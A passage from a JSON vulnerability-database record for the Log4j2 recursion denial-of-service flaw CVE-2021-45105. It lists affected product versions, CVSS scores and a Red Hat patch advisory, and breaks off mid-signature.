"version": "14.1.3.46"
},
{
"_id": null,
"model": "communications cloud native core unified data repository",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.15.0"
},
{
"_id": null,
"model": "log4j",
"scope": "lt",
"trust": 1.0,
"vendor": "apache",
"version": "2.3.1"
},
{
"_id": null,
"model": "insurance data gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.0.1"
},
{
"_id": null,
"model": "communications ip service activator",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.4.0"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "20.12.7"
},
{
"_id": null,
"model": "retail eftlink",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "20.0.1"
},
{
"_id": null,
"model": "retail integration bus",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0.3.1"
},
{
"_id": null,
"model": "retail merchandising system",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0.1"
},
{
"_id": null,
"model": "retail financial integration",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0.0"
},
{
"_id": null,
"model": "retail store inventory management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.3.14"
},
{
"_id": null,
"model": "communications diameter signaling router",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.3.0.0"
},
{
"_id": null,
"model": "communications evolved communications application server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.1"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12.0"
},
{
"_id": null,
"model": "retail price management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.2"
},
{
"_id": null,
"model": "retail price management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.3.0"
},
{
"_id": null,
"model": "communications cloud native core service communication proxy",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.15.0"
},
{
"_id": null,
"model": "communications cloud native core security edge protection proxy",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.7.0"
},
{
"_id": null,
"model": "retail store inventory management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.3.5"
},
{
"_id": null,
"model": "communications pricing design center",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.0.4"
},
{
"_id": null,
"model": "siebel ui framework",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "21.12"
},
{
"_id": null,
"model": "retail eftlink",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "21.0.0"
},
{
"_id": null,
"model": "flexcube universal banking",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.83.3"
},
{
"_id": null,
"model": "payment interface",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.1"
},
{
"_id": null,
"model": "retail merchandising system",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0.3"
},
{
"_id": null,
"model": "communications convergent charging controller",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.1.0.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "retail point-of-service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "health sciences information manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "3.0.1"
},
{
"_id": null,
"model": "log4j",
"scope": "lte",
"trust": 1.0,
"vendor": "apache",
"version": "2.16.0"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12.18.0"
},
{
"_id": null,
"model": "healthcare translational research",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "4.1.0"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "20.12.0.0"
},
{
"_id": null,
"model": "utilities framework",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "4.3.0.1.0"
},
{
"_id": null,
"model": "utilities framework",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "4.4.0.2.0"
},
{
"_id": null,
"model": "webcenter portal",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "managed file transfer",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.58"
},
{
"_id": null,
"model": "autovue for agile product lifecycle management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "21.0.2"
},
{
"_id": null,
"model": "communications cloud native core network function cloud native environment",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.10.0"
},
{
"_id": null,
"model": "hyperion planning",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "11.2.8.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.7.1"
},
{
"_id": null,
"model": "retail eftlink",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "17.0.2"
},
{
"_id": null,
"model": "business intelligence",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "5.5.0.0.0"
},
{
"_id": null,
"model": "data integrator",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0.3.1"
},
{
"_id": null,
"model": "retail integration bus",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0.1"
},
{
"_id": null,
"model": "log4j",
"scope": "gte",
"trust": 1.0,
"vendor": "apache",
"version": "2.4"
},
{
"_id": null,
"model": "flexcube universal banking",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "14.3.0"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.0.1.0.0"
},
{
"_id": null,
"model": "communications cloud native core policy",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.15.0"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.59"
},
{
"_id": null,
"model": "communications session report manager",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.0"
},
{
"_id": null,
"model": "retail integration bus",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0.0"
},
{
"_id": null,
"model": "enterprise manager for peoplesoft",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.5.1.1"
},
{
"_id": null,
"model": "communications webrtc session controller",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.2.1"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "20.12.0"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "20.12.12.0"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "retail financial integration",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0.3"
},
{
"_id": null,
"model": "identity manager connector",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.1.0"
},
{
"_id": null,
"model": "retail financial integration",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0.1"
},
{
"_id": null,
"model": "insurance insbridge rating and underwriting",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "5.6.0.0"
},
{
"_id": null,
"model": "identity management suite",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "retail financial integration",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.3.2"
},
{
"_id": null,
"model": "hyperion profitability and cost management",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "11.2.8.0"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0.1"
},
{
"_id": null,
"model": "communications webrtc session controller",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.2.0.0"
},
{
"_id": null,
"model": "retail predictive application server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0.3.115"
},
{
"_id": null,
"model": "retail price management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0.3.0"
},
{
"_id": null,
"model": "retail predictive application server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0.3.240"
},
{
"_id": null,
"model": "instantis enterprisetrack",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "17.1"
},
{
"_id": null,
"model": "banking deposits and lines of credit servicing",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.12.0"
},
{
"_id": null,
"model": "communications pricing design center",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.0.5"
},
{
"_id": null,
"model": "retail price management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.0.4"
},
{
"_id": null,
"model": "banking payments",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.5"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12.0"
},
{
"_id": null,
"model": "retail integration bus",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0.1"
},
{
"_id": null,
"model": "utilities framework",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "4.4.0.3.0"
},
{
"_id": null,
"model": "retail customer insights",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0.2"
},
{
"_id": null,
"model": "communications session route manager",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.0"
},
{
"_id": null,
"model": "banking enterprise default management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.7.1"
},
{
"_id": null,
"model": "health sciences information manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "3.0.4"
},
{
"_id": null,
"model": "cloud manager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "webcenter sites",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "health sciences inform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.2.1.1"
},
{
"_id": null,
"model": "jdeveloper",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0.1"
},
{
"_id": null,
"model": "retail integration bus",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0.3"
},
{
"_id": null,
"model": "utilities framework",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "4.4.0.0.0"
},
{
"_id": null,
"model": "retail integration bus",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.3.2"
},
{
"_id": null,
"model": "retail order broker",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.0"
},
{
"_id": null,
"model": "hospitality token proxy service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.2"
},
{
"_id": null,
"model": "retail price management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0.3.0"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "21.12"
},
{
"_id": null,
"model": "instantis enterprisetrack",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "17.2"
},
{
"_id": null,
"model": "healthcare master person index",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "5.0.1"
},
{
"_id": null,
"model": "communications asap",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.3"
},
{
"_id": null,
"model": "retail eftlink",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.0.1"
},
{
"_id": null,
"model": "communications convergence",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.0.3.0"
},
{
"_id": null,
"model": "agile plm",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.3.6"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "11.0"
},
{
"_id": null,
"model": "banking party management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.7.0"
},
{
"_id": null,
"model": "communications convergent charging controller",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.0.1.0.0"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.4.0.0"
},
{
"_id": null,
"model": "communications unified inventory management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.4.1"
},
{
"_id": null,
"model": "6bk1602-0aa42-0tp0",
"scope": "lt",
"trust": 1.0,
"vendor": "sonicwall",
"version": "2.7.0"
},
{
"_id": null,
"model": "hyperion bi\\+",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "11.2.8.0"
},
{
"_id": null,
"model": "communications cloud native core network repository function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.15.0"
},
{
"_id": null,
"model": "retail integration bus",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0.1.0"
},
{
"_id": null,
"model": "health sciences inform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.3.2.1"
},
{
"_id": null,
"model": "communications billing and revenue management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.0.4"
},
{
"_id": null,
"model": "communications eagle element management system",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "46.6"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0.3"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12.0.0"
},
{
"_id": null,
"model": "communications convergent charging controller",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.4.0.0"
},
{
"_id": null,
"model": "banking trade finance",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.5"
},
{
"_id": null,
"model": "healthcare foundation",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "7.3.0.1"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.3.2"
},
{
"_id": null,
"model": "web application firewall",
"scope": "gte",
"trust": 1.0,
"vendor": "sonicwall",
"version": "3.0.0"
},
{
"_id": null,
"model": "retail central office",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "6bk1602-0aa12-0tp0",
"scope": "lt",
"trust": 1.0,
"vendor": "sonicwall",
"version": "2.7.0"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.1.0.0"
},
{
"_id": null,
"model": "network security manager",
"scope": "lt",
"trust": 1.0,
"vendor": "sonicwall",
"version": "3.0"
},
{
"_id": null,
"model": "retail customer insights",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0.2"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0.1.0"
},
{
"_id": null,
"model": "retail back office",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "healthcare translational research",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "4.1.1"
},
{
"_id": null,
"model": "retail store inventory management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.0.4.13"
},
{
"_id": null,
"model": "flexcube universal banking",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.0"
},
{
"_id": null,
"model": "log4j",
"scope": "gte",
"trust": 1.0,
"vendor": "apache",
"version": "2.0"
},
{
"_id": null,
"model": "hospitality suite8",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.13.0"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12.11"
},
{
"_id": null,
"model": "retail eftlink",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0.1"
},
{
"_id": null,
"model": "communications convergence",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.0.2.2.0"
},
{
"_id": null,
"model": "retail invoice matching",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0.3"
},
{
"_id": null,
"model": "webcenter portal",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0.0"
},
{
"_id": null,
"model": "banking loans servicing",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.12.0"
},
{
"_id": null,
"model": "hospitality suite8",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.14.0"
},
{
"_id": null,
"model": "communications cloud native core network slice selection function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.8.0"
},
{
"_id": null,
"model": "communications eagle ftp table base retrieval",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "4.5"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.1"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "communications performance intelligence center",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.4.0.3"
},
{
"_id": null,
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.4.0.0"
},
{
"_id": null,
"model": "hyperion data relationship management",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "11.2.8.0"
},
{
"_id": null,
"model": "financial services model management and governance",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8.0.0"
},
{
"_id": null,
"model": "healthcare data repository",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.1"
},
{
"_id": null,
"model": "mysql enterprise monitor",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.29"
},
{
"_id": null,
"model": "identity management suite",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "retail store inventory management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0.3.3"
},
{
"_id": null,
"model": "retail eftlink",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0.3"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12.12"
},
{
"_id": null,
"model": "retail returns management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "communications billing and revenue management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.0.5"
},
{
"_id": null,
"model": "6bk1602-0aa52-0tp0",
"scope": "lt",
"trust": 1.0,
"vendor": "sonicwall",
"version": "2.7.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.12.0"
},
{
"_id": null,
"model": "communications messaging server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1"
},
{
"_id": null,
"model": "communications unified inventory management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.4.2"
},
{
"_id": null,
"model": "managed file transfer",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.1.0.0"
},
{
"_id": null,
"model": "financial services model management and governance",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0.0.0"
},
{
"_id": null,
"model": "communications interactive session recorder",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.3"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "20.12"
},
{
"_id": null,
"model": "data integrator",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "enterprise manager ops center",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.4.0.0"
},
{
"_id": null,
"model": "taleo platform",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1"
},
{
"_id": null,
"model": "communications network integrity",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.3.6"
},
{
"_id": null,
"model": "retail financial integration",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0.1"
},
{
"_id": null,
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.5.0.0"
},
{
"_id": null,
"model": "6bk1602-0aa22-0tp0",
"scope": "lt",
"trust": 1.0,
"vendor": "sonicwall",
"version": "2.7.0"
},
{
"_id": null,
"model": "hyperion tax provision",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "11.2.8.0"
},
{
"_id": null,
"model": "log4j",
"scope": null,
"trust": 0.7,
"vendor": "apache",
"version": null
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-1541"
},
{
"db": "NVD",
"id": "CVE-2021-45105"
}
]
},
"credits": {
"_id": null,
"data": "Guy Lederfein of Trend Micro Security Research",
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-1541"
}
],
"trust": 0.7
},
"cve": "CVE-2021-45105",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2021-45105",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-408743",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.2,
"id": "CVE-2021-45105",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "ZDI",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2021-45105",
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-45105",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "ZDI",
"id": "CVE-2021-45105",
"trust": 0.7,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-408743",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2021-45105",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-1541"
},
{
"db": "VULHUB",
"id": "VHN-408743"
},
{
"db": "VULMON",
"id": "CVE-2021-45105"
},
{
"db": "NVD",
"id": "CVE-2021-45105"
}
]
},
"description": {
"_id": null,
"data": "Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0, 2.12.3, and 2.3.1. This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Apache Log4j. Authentication is not required to exploit this vulnerability.The specific flaw exists within the StrSubstitutor class. The issue results from the lack of proper validation of user-supplied data, which can result in a resource exhaustion condition. An attacker can leverage this vulnerability to create a denial-of-service condition on the process. Log4j is an open source project of Apache. By using Log4j, the destination of log information transmission can be controlled to be console, file, GUI component, even socket server, NT event recorder, etc. Apache Log4j2 has a denial of service vulnerability. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: Red Hat Data Grid 8.2.3 security update\nAdvisory ID: RHSA-2022:0205-01\nProduct: Red Hat JBoss Data Grid\nAdvisory URL: https://access.redhat.com/errata/RHSA-2022:0205\nIssue date: 2022-01-20\nCVE Names: CVE-2021-44832 CVE-2021-45046 CVE-2021-45105 \n=====================================================================\n\n1. Summary:\n\nAn update for Red Hat Data Grid is now available. \n \nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Description:\n\nRed Hat Data Grid is an in-memory, distributed, NoSQL datastore solution. \nIt increases application response times and allows for dramatically\nimproving performance while providing availability, reliability, and\nelastic scale. \n \nData Grid 8.2.3 replaces Data Grid 8.2.2 and includes bug fixes and\nenhancements. Find out more about Data Grid 8.2.3 in the Release Notes [3]. \n\nSecurity Fix(es):\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and\ncontext lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data\ncontains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n3. Solution:\n\nTo install this update, do the following:\n \n1. Download the Data Grid 8.2.3 server patch from the customer portal[\u00b2]. \n2. Back up your existing Data Grid installation. You should back up\ndatabases, configuration files, and so on. \n3. Install the Data Grid 8.2.3 server patch. Refer to the 8.2.3 Release\nNotes[\u00b3] for patching instructions. \n4. Restart Data Grid to ensure the changes take effect. \n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2032580 - CVE-2021-45046 log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)\n2034067 - CVE-2021-45105 log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern\n2035951 - CVE-2021-44832 log4j-core: remote code execution via JDBC Appender\n\n5. References:\n\nhttps://access.redhat.com/security/cve/CVE-2021-44832\nhttps://access.redhat.com/security/cve/CVE-2021-45046\nhttps://access.redhat.com/security/cve/CVE-2021-45105\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=securityPatches\u0026product=data.grid\u0026version=8.2\nhttps://access.redhat.com/documentation/en-us/red_hat_data_grid/8.2/html-single/red_hat_data_grid_8.2_release_notes/index\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG 